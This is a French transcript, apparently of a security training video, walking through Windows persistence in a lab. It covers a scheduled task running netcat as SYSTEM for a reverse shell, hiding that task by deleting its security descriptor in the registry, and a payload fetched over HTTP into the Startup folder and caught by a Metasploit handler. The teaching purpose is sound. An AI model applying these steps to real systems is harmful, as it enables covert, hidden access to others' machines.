cette fois-ci, on va voir l'abus des tâches planifiées. Alors, pareil, ça nous permet d'atteindre de la persistance. Il y a toujours plusieurs façons de faire. Le but, c'est de pousser une charge utile qui va pousser un exploit, qui va nous permettre de récupérer un reverse shell, un shell inverse. Alors, inversé. Le planificateur de tâches, vous l'avez déjà présenté. Comme je vous disais, je vous ai mis toute la playlist où je fais tous les labs Active Directory. C'est des techniques que vous devrez connaître. Il y en a pour des heures et des heures de vidéos. Alors je sais, à l'époque, j'avais pas un micro potable, mais si vous êtes sur ma chaîne, c'est pour le contenu, pour la qualité en soi. Des informations, je dis pas que ma chaîne est quali, je m'en fous, en fait je fais pas ça pour l'argent, contrairement aux autres youtubeurs, tu verras jamais ma gueule. Pourquoi? Parce que je ne suis personne, je suis une ombre, ok? Donc j'ai pas d'ego, moi je me mets pas en avant, je suis pas un influenceur, je m'en fous du YouTube game. Par contre, si tu veux apprendre des choses, tu sais que sur ma chaîne tu pourras apprendre des choses. Alors te plains pas, du montage qui est pourri, je fais tout moi-même. Le son qui est pourri, ouais, je fais tout moi-même. Si t'es là, c'est pour la qualité des informations que je te livre ou pas. Sinon, tu vas sur les autres chaînes, c'est pas grave non plus. Et puis, bah voilà, on avait fait avec les moyens du bord. Alors ouais, il y a des vidéos. Le son est dégueulasse, mais tu pourras apprendre des choses. Encore une fois, je pense que c'est beaucoup plus intéressant de se focaliser sur le contenu que sur la forme. Si tu veux des beaux youtubeurs derrière leur webcam qui font les beaux, eh ben tu vas aller voir ailleurs. Il n'y a pas de problème. On va parler du planificateur de tâches, le schedule task. Ça permet d'interagir avec le planificateur de tâches et je vais pouvoir configurer des tâches qui s'activeront à des heures spécifiques, qui vont se répéter même périodiquement, qui vont déclencher des événements système, comme on les appelle, spécifiques, qui vont nous permettre de récupérer notre porte dérobée. Alors, je vous mettrai la référence complète à Schedule Task pour comprendre le fonctionnement intrinsèque des commandes, le fameux SCH Task, Schedule Task.exe. Nous, on va se créer une petite tâche avec un shell inverse et on va voir comment on pousse ça. Tout simplement, ils nous ont déjà mis Netcat, on va se servir de Netcat, ça sera notre auditeur, notre listener comme on l'appelle. Ça nous permet de récupérer le callback, la communication via un reverse shell. Alors, on repart. On relance la connexion, à mon avis elle est peut-être plantée, je vais relancer ça vite zef. Donc pour ceux qui se posent la question, tu vas me dire ouais mais saltimbanque, t'as déjà le mot de passe de l'administrateur. Oui, mais qu'est-ce qu'on simule? On simule une partie de notre cyberkill chain. D'accord? De notre cyberattaque. J'ai déjà piraté le compte de l'administrateur. Ouais, en effet. Ces vidéos portent sur la persistance. Qu'est-ce que la persistance? Eh ben, ça fait partie de la dernière étape de ma cyberattaque qu'on appelle une cyberkill chain et c'est la post-exploitation. La post-exploit, tu le fais tout le temps à la fin. D'accord? Donc c'est normal. Tu vas me dire, ah ouais, mais tu m'as pas montré comment pirater la machine. Je vais te dire, il y a 1200 vidéos sur ma chaîne. Regarde-les et puis après, tu m'envoies un petit commentaire si vraiment j'ai pas satisfait tes attentes. Plus sérieusement, on va se connecter. D'accord? Donc je lui dis minutes. Après, il faut que je lui dise combien de minutes. Je vais lui dire 1 minute. D'accord? Après, on va utiliser le RU. Ça indique que la tâche va s'exécuter et je peux choisir. Je vais lui dire système, NT, Authority System, vous comprenez. Mais d'abord, qu'est-ce qu'il faut? Un nom. Donc ça, je vais lui donner la même tâche, sinon je ne vais pas récupérer mon drapal. Un drapeau des drapals, comme vous le savez en français. Voilà. Alors, là, on a quoi? On a le TR. Grosso modo, c'est le chemin. Le chemin, ils sont cool. Ils nous ont mis dans Tools NC64. Sinon, j'aurais dû le télécharger sur le serveur pour faire mon attaque. Tu l'as bien compris. ECMD, tu sais, on exécute dans la foulée quoi? Une commande. Cette commande, c'est quoi? C'est se connecter à ma machine. Parfait. Faut que je referme. Il faut que je mette un port, pardon. Donc je vais prendre le 443 comme tout à l'heure et c'est là que je fais mon RU et je lui dis exécute en tant que système. Ok, il nous dit écoute, la nouvelle tâche planifiée THM Task Backdoor a été créée. Donc j'ai mon auditeur, mon listener qui écoute, qui va récupérer le callback. Notre reverse shell, pourquoi? Parce que ça c'est mon ordinateur, c'est pas moi qui vais me connecter au serveur et je vais me péter les dents sur le pare-feu, c'est lui qui se connecte à ma machine, donc c'est un reverse shell.
Lui, c'est une connexion sortante vers mon ordinateur. C'est pas moi qui fais une connexion sortante vers son ordinateur. Donc, c'est pour ça qu'on appelle un reverse. Et lui, qu'est-ce qu'il va faire? Le Netcat va se connecter à mon ordinateur à telle adresse sur tel port. D'accord? En tant que système. Donc, comme il se connecte en tant que système, j'ai quoi? Je vais avoir les pleins pouvoirs. NT Authority System. Ok. Donc, c'est opérationnel. Mais s'il liste les tâches planifiées, qu'est-ce qui va se passer? Tu vas voir quoi? Tu vas voir ma porte dérobée. Hein? Elle doit être quelque part là-dedans. Ok, donc là, elle est parmi celles-là. Cependant, je voudrais autre chose. Je peux lui faire un petit point d'interrogation. Est-ce qu'on peut pas faire une recherche? Tout simplement, ça serait peut-être plus simple. Donc, je peux faire un query. Et puis, on va faire un find string. Find str, c'est l'équivalent d'un grep. Et je vais lui dire... comment on l'a appelé? On l'a appelé schedule task. Ok, il la trouve. Allez, en running. Autant pour moi. Donc, maintenant, on va la rendre invisible. Pour tout utilisateur du système, ce qu'on peut faire, c'est ce qu'on appelle un SD. C'est un descripteur de sécurité et le descripteur de sécurité, c'est simplement une liste de contrôle qui indique aux utilisateurs quel utilisateur ont accès à la tâche planifiée techniquement. D'accord? Donc, si votre utilisateur n'est pas autorisé à interroger une tâche planifiée, vous ne pourrez plus la voir, car Windows ne vous montre que les tâches auxquelles vous êtes autorisé, soit à utiliser, soit à vérifier, à aller voir. D'accord? Donc, la suppression de la mémoire SD, ça équivaut à interdire l'accès à tous les utilisateurs de la tâche planifiée, y compris les administrateurs. D'accord? Security Descriptor SD. Donc là, ça commence à devenir assez violent. Il faut être système. Si je suis pas système, je vais être bloqué. Donc, on va refaire notre escalade de privilèges via psexec. Je vous ai dit, outil très utilisé, mais outil très, très, très dangereux. Voilà. Pourquoi? Je vous ai dit SI plus le programme que tu veux et ça t'édite élévation de privilèges assez violente. Techniquement, on a quoi? On a le local machine toujours. On a vu dans software Microsoft, on a des trucs sympathiques. On a quoi? Si je descends tout en bas, on a un W. On doit avoir un Windows NT, si je dis pas de bêtises. Je vais élargir. Windows NT. Current version, classique. Et là, vous avez plein de trucs, mais nous, ce qui nous intéresse, c'est le SSS, schedule, planification. Intéressant. Là-dedans, j'ai quoi? J'ai encore plein de trucs. On parle des tâches, le cache des tâches, littéralement. D'accord? On va aller dans l'arbre, le tree, et dans le tree, vous avez quoi? Vous l'avez vu. On a notre SD qui est ici. D'accord? Donc, c'est pareil. Qu'est-ce qu'on peut faire? On peut le modifier. Mais on peut faire encore plus vicieux. Qu'est-ce qu'on pourrait faire? On peut carrément le supprimer. Delete. Comme je suis NT Authority System, je peux faire ce que je veux. Donc là, qu'est-ce qui se passe du coup? Tu te rappelles ce qu'on avait fait? À l'instant, j'avais requêté. Et là, il n'y a plus rien. D'accord? Il n'y a plus rien. Pourquoi? Parce que, folder THM, mais bon, je sais pas trop, en fait. Il n'arrive plus à la trouver. Je reprends le nom exact. On l'avait appelé THM Task Backdoor. Voilà. Cannot find the file specified. Donc, je ne peux pas trouver le nom de la tâche planifiée du fichier. Alors, vous l'avez compris, maintenant, qu'est-ce qu'on va pouvoir faire? On va pouvoir tout simplement. Donc, qu'est-ce qu'on a vu? Toutes les minutes, il y a quelque chose qui se passe. Toutes les minutes, on récupère la main. D'accord? Donc voilà, ça c'est une petite technique à connaître. Le SD c'est assez vicieux puisqu'il va falloir après faire des opérations au bas niveau pour récupérer la tâche planifiée et savoir ce qui se passe. Alors maintenant on va voir tout ce qui est ouverture. Je vous le disais, on peut le faire à l'ouverture de session de l'admin par exemple. On a certaines actions effectuées par un utilisateur qui peuvent être liées à l'exécution de nos charges utiles spécifiques pour de la persistance, mais contrairement aux précédentes techniques qu'on a vues, cette fois-ci, on va attendre tout simplement que l'utilisateur se reconnecte et vous le savez, les systèmes d'exploitation Windows, ils ont toujours
hein, plusieurs façons pour nous, attaquants, de lier nos charges utiles à des interactions, soit de la part de l'utilisateur, soit à des événements chronologiques, temporels, soit des actions de l'utilisateur ou du système. D'accord? Donc on va pouvoir planter nos portes dérobées qui sont exécutées et vous l'avez compris, dès que l'utilisateur se connectera au système, la porte dérobée va se charger. D'accord? Donc c'est assez vicieux. Pourquoi? Parce que si c'est bien fait, parfois, euh, ton antivirus, qu'est-ce qu'il fait? Il scanne au démarrage. Hein, avant que tu arrives sur ta mire de connexion Windows, il va scanner la mémoire. Il regarde s'il n'y a rien qui se charge. Et il n'y a rien qui se charge. Par contre, toi, dès que tu lances ton Windows et que tu te connectes, il y a peut-être des composants critiques du système qui ont été backdoorés et qui vont charger le virus. Et là, l'antivirus, c'est pas sûr qu'il chope. Tu vois? Donc, c'est des techniques à connaître. Encore une fois, tout va dépendre des méthodes d'analyse de vos antivirus et des systèmes de défense en place. Je vais réouvrir un petit sudo ufw status verbose. Inactive. Ah bah c'est beau ça. Ok, 443,80. Ok, donc qu'est-ce qu'on peut faire techniquement? Je vais héberger un Python, un petit serveur Python, comme tout à l'heure. Python 3, mais non. Python 3-m http serveur sur le port 80, puisque je l'ai ouvert, je vais pouvoir pousser ma charge utile. On va se reconnecter sur notre serveur, je mets déco de là, je regarde. Ah si, il va falloir un MSF console. Bon, alors je le lance. Ça, on le dégage pour l'instant, on revient là-dessus. Alors, techniquement, t'as quoi? Sur tous les Windows, t'as User. Dans User, t'as quoi? Tu le sais, t'as ton nom d'utilisateur. Moi, ça peut être n'importe quoi. Ça peut être THM User 4, par exemple. Et là-dedans, j'ai quoi? J'ai un truc très sensible qui s'appelle AppData. Tu l'avais vu, et on en a 3. Local, Local Now, Roaming. D'accord? Et Local Low, alors là, c'est une question de privilège, et le roaming, généralement, les applications se mettent là-dedans. Ça permet le multi-environnement. Si vous avez des profils nomades en entreprise et que vous utilisez plusieurs ordinateurs, mais vous vous connectez avec le même compte de l'Active Directory, en gros, vous n'aurez pas besoin de réinstaller l'application sur un autre PC. Il va venir le charger à partir d'un autre ordinateur. Je ne vais pas rentrer dans les détails, ça ne nous intéresse pas pour ce qui est là. Nous, ce qu'on veut, c'est aller à cet endroit. Ça, il faut retenir. Et pourquoi roaming? Je viens de te l'expliquer. Ça veut dire que peu importe, il y a une synchro. Quand l'utilisateur se connecte au sein de l'Active Directory, il va aller taper dans roaming. Et dans roaming, en gros, il va y avoir notre charge utile. Et donc, il n'aura même pas besoin de se connecter forcément à cette machine. Juste avec son compte Active Directory, ça va synchroniser via le partage. Et ça va pousser notre porte dérobée. Donc, ça va exécuter ce qu'il y a dans son dossier. Mais nous, il faut aller encore plus loin. Donc là, il n'y a rien. C'est intéressant. Bon, on va prendre l'admin. Vu que je n'ai pas trop le choix. On a dit AppData. Roaming. Ouais. Microsoft. Tout à fait. Windows. Et ça, vous le connaissez. On a quoi? Dans le Start menu, tu as Programme, certes. Et tu as surtout un truc qui s'appelle Programme et qui s'appelle Startup. Et dans Startup, tout ce qui est là, tu l'as compris, ça se lance au démarrage. Ça tombe bien, c'est ce qu'on veut. Alors, je veux dire, tu te connectes à ma machine, c'est pour ça que j'ai fait le serveur Python HTTP pour pousser l'exploit. J'arrive pas à m'en rappeler, c'est un truc de fou. 1669 de mémoire. Et on va l'appeler, c'est mon petit.exe. Donc, il arrive à l'atteindre. Maintenant, on va le sauvegarder. Et on va l'appeler toto.exe. Donc, on doit avoir mon toto.exe. Parfait. Maintenant, il faut gérer le serveur de command and control. On est reparti. Qu'est-ce que je veux 7G.
lhost. Donc ça c'est ma machine, ça sera Thune 0. Mon interface de VPN, je veux le port, celui qu'on utilise dans les précédentes vidéos, le 443 HTTPS. Qu'est-ce que je veux d'autre? J'ai ouvert le port, hein, d'ailleurs, c'est pour ça que je prends celui-là. Vous pouvez prendre ce que vous voulez. On va use exploit toujours le multi-handler. Pourquoi multi? Parce que peu importe la machine qui essaie de se connecter à notre ordinateur, Mac, Unix, Spark, ce que vous voulez. Il y a vraiment mainframe, Windows, Linux, macOS, peu importe. Android, iPhone, ça va récupérer la main. Et on appelle ça un multi-handler. Vous l'utiliserez tout le temps, tout le temps, tout le temps. Par défaut, il utilise ce qu'on a défini. On devrait être bon au niveau des options. Et on peut faire un run. Alors, je me distrais et je fais de la merde. Pourquoi? Parce que c'est un payload service. Moi, il me faut une application. Donc, j'avais tout faux. Ok, donc on doit avoir Toto. C'est pas grave, on peut le laisser, c'est pas un problème en soi. Je peux juste ouvrir une autre fenêtre. Récupérer ma commande. Non, c'était pas celle-là, c'est la 704. Ouais, on va l'adapter. On va lui dire exploit.exe. Ça, j'en ai pas besoin. Ça dégage. Thune 0. Ok, ça pareil, j'en ai pas besoin. Dégage, dégage. Ok. Alors, wget http 10 11 26 69 port 80 exploit 10 11 16 69 10 11 16 69 sur le port 80 et c'est exploit.exe. Dire parfait. On va simuler le redémarrage. Sign out. Je relance Remina, l'administrateur se reconnecte. Et voilà, on est dans la place. D'accord? Donc vous voyez, hein, c'est assez violent. Dès qu'il se redémarre, il récupère l'exploit, on le pousse vers le serveur et dès que l'administrateur se connecte, on récupère la main. Parce que j'ai ouvert mon port 443 et ça se connecte à ma machine.